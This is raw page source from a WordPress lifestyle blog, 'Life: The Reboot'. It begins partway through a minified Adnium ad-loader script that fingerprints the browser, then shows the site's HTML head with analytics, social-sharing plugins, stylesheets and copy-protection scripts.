n={zone:"1942",site:"1237",host:"//a.adnium.com",width:"300",height:"250",pub:"2128",type:"1",dt:"false",loaded:!1,viewable:!1,parent:!1,script:null,print:"",extra:[function(){var e=o.attr("data-email");return e.length>0&&/^[\w\.\-_]{1,}@[\w\.\-]{6,}/.test(decodeURIComponent(e))?"email="+e:""},function(){var e=o.attr("data-sub");return e.length>0?"s1="+e:""}]},i=new Fingerprint2,o={isParent:function(){try{return e.self!==e.top}catch(t){return!0}},get:function(e){for(var n=!1,i=[function(){return localStorage[e]},function(){return sessionStorage[e]},function(){var n,i,o,a=t.cookie.split(";");for(n=0;n<a.length;n++)if(i=a[n].substr(0,a[n].indexOf("=")),o=a[n].substr(a[n].indexOf("=")+1),i=i.replace(/^\s+|\s+$/g,""),i===e)return decodeURI(o)}],a=0;a<i.length;a++)if(n=this.safe(i[a]),!o.def(n)&&n!==!1)return n;return""},set:function(e,n){var i=[function(){localStorage[e]=n},function(){sessionStorage[e]=n},function(){var i=new Date,o=encodeURI(n)+"; expires="+i.setSeconds(i.getSeconds()+31536e4).toUTCString();t.cookie=e+"="+o}];i.forEach(function(e){o.safe(e)})},safe:function(e){try{return e()}catch(t){return!1}},attr:function(e){var t=n.script.getAttribute(e);return null===t?"":encodeURIComponent(t)},style:function(e,n){return t.defaultView.getComputedStyle(e,null)[n]},url:function(e){try{var i=(n.parent?t.referer:t.location.href).substring(0,255);return e?encodeURIComponent(i):i}catch(o){return""}},title:function(){if(n.parent)return this.url(!1).replace(/[^a-z0-9]/gim," ").replace(/(https?|www)/gim," ").replace(/\s+/g," ").substring(0,255);var e=t.getElementsByTagName("title")[0];return(o.def(e)?"":e.innerText).substring(0,255)},def:function(e){return"undefined"==typeof e},visible:function(e,n,i,o,a,r,s){var d=e.parentNode,l=2;return(e===t.body?!0:t.body.contains(e))?9===d.nodeType||"HTML"===d.nodeName?!0:"SCRIPT"===e.nodeName||"0"!==this.style(e,"opacity")&&"none"!==this.style(e,"display")&&"hidden"!==this.style(e,"visibility")?((this.def(n)||this.def(a)||this.def(o)||this.def(i)||this.def(r)||this.def(s))&&(n=e.offsetTop,i=e.offsetLeft,o=n+e.offsetHeight,a=i+e.offsetWidth,r=e.offsetWidth,s=e.offsetHeight),d?e.offsetParent!==d||"hidden"!==this.style(d,"overflow")&&"scroll"!==this.style(d,"overflow")||!(i+l>d.offsetWidth+d.scrollLeft||i+r-l<d.scrollLeft||n+l>d.offsetHeight+d.scrollTop||n+s-l<d.scrollTop)?(e.offsetParent===d&&(i+=d.offsetLeft,n+=d.offsetTop),this.visible(d,n,i,o,a,r,s)):(console.log("D"),!1):!0):!1:!1}},a={pre:function(){return e.adnLoaded=o.def(e.adnLoaded)?[]:e.adnLoaded,-1!==e.adnLoaded.indexOf(n.zone)?!1:(e.adnLoaded.push(n.zone),!0)},init:function(){return n.parent=o.isParent(),n.script=t.getElementById("adn-"+n.zone),null!==n.script&&o.visible(n.script)?this.frame():!1},src:function(){var e=n.host+"/loader?a="+n.zone,t=o.url(!0),a=encodeURIComponent(o.title()),r=["v=2","t="+n.type,"s="+n.site,"p="+n.pub,"if="+n.parent,"fp="+n.print,"adb="+i.getAdBlock()];return 0!==t.length&&r.push("url="+t),0!==a.length&&r.push("title="+a),n.extra.forEach(function(e){var t=o.safe(e);t=t&&0!==t.length?r.push(t):""}),e+="&"+r.join("&")},frame:function(){var e=n.script.parentNode,i=t.createElement("iframe");if(null===e)return!1;if(i.src=this.src(),i.width=n.width,i.height=n.height,i.scrolling="no",i.style.cssText="border:0;display:block;",i.sandbox="allow-popups allow-scripts allow-same-origin allow-forms",i.setAttribute("data-zone",n.zone),"SCRIPT"===n.script.nodeName){for(var o=e.childNodes,a=0;a<o.length;a++)"SCRIPT"===o[a].nodeName&&-1!==o[a].innerHTML.indexOf("adn")&&-1!==o[a].innerHTML.indexOf("id="+n.zone)&&e.removeChild(o[a]);try{e.removeChild(t.currentScript)}catch(r){}return e.appendChild(i),!1}n.script.appendChild(i)}};!function(){if(!a.pre())return!1;var e=o.get("ADNF");return 0===e.length?(i.get(function(e){n.print=e,"false"===n.dt&&o.set("ADNF",e),a.init()}),!1):(n.print=e,void a.init())}()}(window,document);
0
<!DOCTYPE html> <!--[if IE 9]><html class="no-js ie9" lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"><![endif]--> <!--[if gt IE 9]><!--><html class="no-js" lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#"><!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="canonical" href="https://lifethereboot.com/time-management-software-and-routines/"> <!--[if lt IE 9]><script charset="UTF-8" src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script><![endif]--> <!--[if lt IE 8]><p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p><![endif]--> <title>Life: The Reboot &ndash; Reclaim Your Life!</title> <!-- Social Warfare v3.6.0 https://warfareplugins.com --><style>@font-face {font-family: "sw-icon-font";src:url("https://lifethereboot.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://lifethereboot.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://lifethereboot.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"), url("https://lifethereboot.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://lifethereboot.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight: normal;font-style: normal;}</style> <!-- Social Warfare v3.6.0 https://warfareplugins.com --> <script>window._wca = window._wca || [];</script> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Reclaim Your Life!"/> <link rel="canonical" href="https://lifethereboot.com/" /> <link rel="next" href="https://lifethereboot.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Life: The Reboot &ndash; Reclaim Your Life!" /> <meta property="og:description" content="Reclaim Your Life!" /> <meta property="og:url" content="https://lifethereboot.com/" /> <meta property="og:site_name" content="Life: The Reboot" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Reclaim Your Life!" /> <meta name="twitter:title" content="Life: The Reboot &ndash; Reclaim Your Life!" /> <meta name="twitter:site" content="@lifethereboot" /> <meta name="google-site-verification" content="EitdhDS15tUl3eMeMjjrHd905sz4dtQW_3mkRgXVkzA" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://lifethereboot.com/#organization","name":"Life: The Reboot","url":"https://lifethereboot.com/","sameAs":["https://www.facebook.com/lifethereboot/","https://www.instagram.com/lifethereboot/?hl=en","https://www.pinterest.com/lifethereboot/pins/","https://twitter.com/lifethereboot"]},{"@type":"WebSite","@id":"https://lifethereboot.com/#website","url":"https://lifethereboot.com/","name":"Life: The Reboot","publisher":{"@id":"https://lifethereboot.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://lifethereboot.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://lifethereboot.com/#webpage","url":"https://lifethereboot.com/","inLanguage":"en-US","name":"Life: The Reboot &ndash; Reclaim Your Life!","isPartOf":{"@id":"https://lifethereboot.com/#website"},"about":{"@id":"https://lifethereboot.com/#organization"},"description":"Reclaim Your Life!"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//cdn001.milotree.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel='dns-prefetch' href='//k4z6w9b5.stackpathcdn.com' /> <link rel='dns-prefetch' href='//cdn.shareaholic.net' /> <link rel='dns-prefetch' href='//www.shareaholic.net' /> <link rel='dns-prefetch' href='//analytics.shareaholic.com' /> <link rel='dns-prefetch' href='//recs.shareaholic.com' /> <link rel='dns-prefetch' href='//go.shareaholic.com' /> <link rel='dns-prefetch' href='//partner.shareaholic.com' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Life: The Reboot &raquo; Feed" href="https://lifethereboot.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Life: The Reboot &raquo; Comments Feed" href="https://lifethereboot.com/comments/feed/" /> <!-- Powered by Shareaholic; Grow your audience faster! - https://www.shareaholic.com --> <link rel='preload' href='//cdn.shareaholic.net/assets/pub/shareaholic.js' as='script' /> <script data-cfasync='false'> //<![CDATA[ _SHR_SETTINGS = {"endpoints":{"local_recs_url":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php?action=shareaholic_permalink_related","ajax_url":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php"}}; //]]> </script> <script data-cfasync='false' src='//cdn.shareaholic.net/assets/pub/shareaholic.js' data-shr-siteid='288e97d19b83ad0ca3d74070b33eda85' async > </script> <!-- Shareaholic Content Tags --> <meta name='shareaholic:site_name' content='Life: The Reboot' /> <meta name='shareaholic:language' content='en-US' /> <meta name='shareaholic:article_visibility' content='private' /> <meta name='shareaholic:site_id' content='288e97d19b83ad0ca3d74070b33eda85' /> <meta name='shareaholic:wp_version' content='8.12.6' /> <!-- Shareaholic Content Tags End --> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-116921854-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-116921854-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/lifethereboot.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=1554735172"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='social-warfare-block-css-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/social-warfare/assets/js/post-editor/dist/blocks.style.build.css?ver=1557088977' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1557934834' type='text/css' media='all' /> <link rel='stylesheet' id='wc-block-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/woo-gutenberg-products-block/build/style.css?ver=1557884164' type='text/css' media='all' /> <link rel='stylesheet' id='bcct_style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/better-click-to-tweet/assets/css/styles.css?ver=1552273248' type='text/css' media='all' /> <link rel='stylesheet' id='SFSImainCss-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/ultimate-social-media-icons/css/sfsi-style.css?ver=1557185827' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-layout-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/woocommerce-layout.css' type='text/css' media='all' /> <style id='woocommerce-layout-inline-css' type='text/css'> .infinite-scroll .woocommerce-pagination { display: none; } </style> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/woocommerce-smallscreen.css' type='text/css' media='only screen and (max-width: 768px)' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='wpurp_style_minified-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-ultimate-recipe/assets/wpurp-public-forced.css?ver=1551297528' type='text/css' media='all' /> <link rel='stylesheet' id='wpurp_style1-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-ultimate-recipe/vendor/font-awesome/css/font-awesome.min.css?ver=1551297525' type='text/css' media='all' /> <link rel='stylesheet' id='wpurp_style2-css' href='https://fonts.googleapis.com/css?family=Open+Sans&#038;ver=3.12.5' type='text/css' media='all' /> <link rel='stylesheet' id='social_warfare-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=1557088977' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/style.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-main-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/style-ltr.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-animate-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/plugins/animatecss/animate.min.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-photoswipe-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/plugins/photoswipe/photoswipe.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-photoswipe-skin-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/plugins/photoswipe/default-skin/default-skin.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-justifiedgallery-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/plugins/justifiedgallery/justifiedGallery.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-dark-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/dark.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-light-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/light.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-woocommerce-style-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/css/woocommerce.css?ver=1545347210' type='text/css' media='all' /> <link rel='stylesheet' id='WRT-google_fonts-css' href='https://fonts.googleapis.com/css?family=Alice%3Aregular%7CPlayfair+Display%3Aregular%7C&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var gadwpUAEventsData = {"options":{"event_tracking":0,"event_downloads":"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*","event_bouncerate":0,"aff_tracking":1,"event_affiliates":"\/out\/","hash_tracking":"1","root_domain":"lifethereboot.com","event_timeout":100,"event_precision":0,"event_formsubmit":1,"ga_pagescrolldepth_tracking":1,"ga_with_gtag":0}}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/google-analytics-dashboard-for-wp/front/js/tracking-analytics-events.js?ver=1556121724'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/google-analytics-dashboard-for-wp/front/js/tracking-scrolldepth.js?ver=1556121724'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/lifethereboot.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=1556121727'></script> <link rel='https://api.w.org/' href='https://lifethereboot.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://lifethereboot.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://lifethereboot.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/9JjwD' /> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-115394905-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-115394905-1'); </script> <meta name="p:domain_verify" content="63b0cc45e374e57e4a83bcf3eca420a6"/> <script type="text/javascript" src="https://load.fomo.com/api/v1/FZ4KbZO9cW7-1DYr3mlrkg/load.js" async></script><script id="wpcp_disable_selection" type="text/javascript"> //<![CDATA[ var image_save_msg='You Can Not Save images!'; var no_menu_msg='Context Menu disabled!'; var smessage = "Content is protected !!"; function disableEnterKey(e) { if (e.ctrlKey){ var key; if(window.event) key = window.event.keyCode; //IE else key = e.which; //firefox (97) //if (key != 17) alert(key); if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85 || key == 86 || key == 83 || key == 43) { show_wpcp_message('You are not allowed to copy content or view source'); return false; }else return true; } } function disable_copy(e) { var elemtype = e.target.nodeName; var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor); elemtype = elemtype.toUpperCase(); var checker_IMG = ''; if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { if (smessage !== "" && e.detail == 2) show_wpcp_message(smessage); if (isSafari) return true; else return false; } } function disable_copy_ie() { var elemtype = window.event.srcElement.nodeName; elemtype = elemtype.toUpperCase(); if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { //alert(navigator.userAgent.indexOf('MSIE')); //if (smessage !== "") show_wpcp_message(smessage); return false; } } function reEnable() { return true; } document.onkeydown = disableEnterKey; document.onselectstart = disable_copy_ie; if(navigator.userAgent.indexOf('MSIE')==-1) { document.onmousedown = disable_copy; document.onclick = reEnable; } function disableSelection(target) { //For IE This code will work if (typeof target.onselectstart!="undefined") target.onselectstart = disable_copy_ie; //For Firefox This code will work else if (typeof target.style.MozUserSelect!="undefined") {target.style.MozUserSelect="none";} //All other (ie: Opera) This code will work else target.onmousedown=function(){return false} target.style.cursor = "default"; } //Calling the JS function directly just after body load window.onload = function(){disableSelection(document.body);}; //]]> </script> <script id="wpcp_disable_Right_Click" type="text/javascript"> //<![CDATA[ document.ondragstart = function() { return false;} /* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Disable context menu on images by GreenLava Version 1.0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */ function nocontext(e) { return false; } document.oncontextmenu = nocontext; //]]> </script> <style> .unselectable { -moz-user-select:none; -webkit-user-select:none; cursor: default; } html { -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-tap-highlight-color: rgba(0,0,0,0); } </style> <script id="wpcp_css_disable_selection" type="text/javascript"> var e = document.getElementsByTagName('body')[0]; if(e) { e.setAttribute('unselectable',on); } </script> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><style> html, body {font-family:Alice;font-size:16px;line-height:1.5;font-weight:regular;font-style:normal;letter-spacing:0px;}.site-wrapper.boxed-wrapper{max-width:80em}@media screen and (min-width: 1200px){ .site-container {max-width:75em}}h1, h2, h3, h4, h5, h6, blockquote, .site-search input[type="search"], .site-search input[type="text"], .banner-text .banner-text-title, .entry-title, .entry .entry-header .entry-title, .entry .entry-text blockquote, .standard-container .entry .entry-header .entry-title{font-family:Playfair Display;}.site-search input[type="search"], .site-search input[type="text"], .banner-text .banner-text-title, .entry-title, .entry .entry-header .entry-title, .entry .entry-text blockquote, .standard-container .entry .entry-header .entry-title{font-size:2.25rem;font-weight:regular;font-style:normal;letter-spacing:0px;}.mega-menu-block .mega-post-title, .author .author-meta .author-name, .entry .entry-navigation a, .widget.widget_posts .entry-list .entry .entry-title, .widget.widget_rss ul li .rsswidget, .widget.widget_wrt_shop .products-list .product .product-title, .widget_wrt_social .social-navigation{font-family:Playfair Display;font-weight:regular;font-style:normal;letter-spacing:0px;}.widget.widget_posts .entry-list .entry:before{font-family:Playfair Display;letter-spacing:0px;}.widget.widget_wrt_recent-post .entry-list .entry .entry-title, .widget.widget_wrt_popular-post .entry-list .entry .entry-title, .widget.widget_recent_entries ul li a{font-family:Playfair Display;}@media(max-width:767px){.site-search input[type="color"], .site-search input[type="date"], .site-search input[type="datetime"], .site-search input[type="datetime-local"], .site-search input[type="email"], .site-search input[type="month"], .site-search input[type="number"], .site-search input[type="password"], .site-search input[type="search"], .site-search input[type="tel"], .site-search input[type="text"], .site-search input[type="time"], .site-search input[type="url"], .site-search input[type="week"], .site-search textarea, .banner-text .banner-text-title, .entry .entry-header .entry-title, .entry .entry-text blockquote, .standard-container .entry .entry-header .entry-title{font-size:1.575em;letter-spacing:0;}}@media(min-width:768px){.banner-text .banner-text-title{font-size:1.5em!important;font-weight:regular;font-style:normal;}.banner-text .banner-text-cat{font-weight:regular;font-style:normal;}.banner-text .banner-text-date, .banner-text .banner-text-author{font-weight:regular;font-style:normal; }}.entry-content a,a:active, a:focus, a:hover{color:#1e73be}.social-navigation.theme-colors, .theme-colors.author-navigation, .site-breadcrumbs .delimiter, .site-breadcrumbs .current, .breadcrumbs .delimiter, .breadcrumbs .current, .comments-area .comments-list .comment .comment-meta .comment-header .comment-reply, .comment .comment-meta .comment-reply, .entry .entry-header .entry-meta .entry-cat, .entry .entry-quote-author, .widget.widget_wrt_recent-post .entry-list .entry .entry-meta .entry-cat, .widget.widget_wrt_popular-post .entry-list .entry .entry-meta .entry-cat, .widget.widget_posts .entry-list .entry .entry-meta .entry-cat, .widget.widget_categories ul li a:hover, .widget_nav_menu ul li a:hover, .widget_pages ul li a:hover, .widget_meta ul li a:hover, .widget.widget_product_categories ul li a:hover, .widget.widget_archive ul li a:hover, .widget.widget_archives ul li a:hover, .widget.widget_wrt_twitter .tweets-list .tweet a, .widget.widget_recent_comments .recentcomments span a, .widget.widget_tag_cloud .tagcloud a:hover{ color :#1e73be}.widget.widget_product_categories ul li a:before, .widget_categories ul li a:before, .widget_nav_menu ul li a:before, .widget_pages ul li a:before, .widget_meta ul li a:before, .widget_archive ul li a:before, .widget_archives ul li a:before {background-color: #1e73be }input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="name"]:focus, input[type="number"]:focus, input[type="password"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="text"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, textarea:focus, select:focus, textarea:focus, .widget.widget_tag_cloud .tagcloud a:hover{ border-color:#1e73be} .site-banner .banner-item{padding:2px} .banner-item .banner-media{ height: 500px; }.group-of-3 .banner-items-grid .banner-item:nth-child(2) .banner-media, .group-of-3 .banner-items-grid .banner-item:nth-child(3) .banner-media, .group-of-3 .banner-items-grid .banner-item:nth-child(4) .banner-media, .group-of-4 .banner-items-grid .banner-item:nth-child(2) .banner-media, .group-of-4 .banner-items-grid .banner-item:nth-child(3) .banner-media, .group-of-4 .banner-items-grid .banner-item:nth-child(4) .banner-media{ height: 248px; }.ht-light .site-header .site-header-top, .ht-dark .site-header .site-header-top, .ht-light .site-header .site-header-one .site-header-top, .ht-dark .site-header .site-header-one .site-header-top, .ht-light.is-sticky-started .site-header .site-header-one .site-header-top, .ht-dark.is-sticky-started .site-header .site-header-one .site-header-top, .ht-light.theme-header1 .site-mobile-navigation, .ht-light.theme-header3 .site-mobile-navigation, .ht-dark.theme-header1 .site-mobile-navigation, .ht-dark.theme-header3 .site-mobile-navigation, .ht-light .site-header-three .primary-navigation ul, .ht-light .site-header-four .primary-navigation ul, .ht-dark .site-header-three .primary-navigation ul, .ht-dark .site-header-four .primary-navigation ul{ background-color:; color:;}.hm-light .site-header .site-header-middle, .hm-dark .site-header .site-header-middle, .hm-light .site-header .site-header-two .site-header-middle, .hm-dark .site-header .site-header-two .site-header-middle, .hm-light.theme-header2 